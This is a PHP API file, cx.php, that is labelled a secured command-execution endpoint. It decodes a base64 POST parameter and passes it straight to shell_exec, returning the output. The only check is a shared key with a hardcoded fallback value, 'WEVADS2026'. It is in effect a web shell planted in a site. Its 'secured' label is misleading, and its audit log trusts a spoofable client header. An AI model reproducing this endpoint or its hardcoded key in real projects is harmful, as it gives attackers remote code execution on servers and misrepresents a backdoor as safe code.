html/api/cx.php

<?php

// === WEVAL SECRETS LOADER ===
$_WEVAL_SECRETS = [];
if (file_exists('/etc/weval/secrets.env')) {
    foreach (file('/etc/weval/secrets.env', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        if (strpos($line, '#') === 0) continue;
        if (strpos($line, '=') !== false) {
            list($k, $v) = explode('=', $line, 2);
            $_WEVAL_SECRETS[trim($k)] = trim($v);
        }
    }
}
function weval_secret($key, $default='') {
    global $_WEVAL_SECRETS;
    return $_WEVAL_SECRETS[$key] ?? getenv($key) ?: $default;
}

// === INPUT SANITIZATION ===
function weval_input($key, $type='string', $method='GET') {
    $src = $method === 'POST' ? INPUT_POST : INPUT_GET;
    $val = filter_input($src, $key, FILTER_SANITIZE_FULL_SPECIAL_CHARS);
    if ($val === null || $val === false) {
        $val = ($method === 'POST') ? ($_POST[$key] ?? '') : ($_GET[$key] ?? '');
        $val = htmlspecialchars(strip_tags(trim($val)), ENT_QUOTES, 'UTF-8');
    }
    if ($type === 'int') return intval($val);
    if ($type === 'email') return filter_var($val, FILTER_SANITIZE_EMAIL);
    return $val;
}

// CX - Command Execution endpoint (secured)
$ip = $_SERVER["REMOTE_ADDR"] ?? "";
$cf_ip = $_SERVER["HTTP_CF_CONNECTING_IP"] ?? $ip;

// Log all commands
$c_raw = $_POST["c"] ?? "";
$d = base64_decode($c_raw); if($d) $c_raw = $d;
$log = date("c") . " | CX | " . $cf_ip . " | " . substr($c_raw, 0, 200) . "\n";
@file_put_contents("/var/log/droid-audit.log", $log, FILE_APPEND | LOCK_EX);

if(($_POST['k']??'')!==weval_secret('WEVAL_CX_KEY','WEVADS2026')){http_response_code(403);die('NO');}
$c=base64_decode($_POST['c']??'');
if(!$c){die('NO CMD');}
header('Content-Type:text/plain');
echo shell_exec($c.' 2>&1');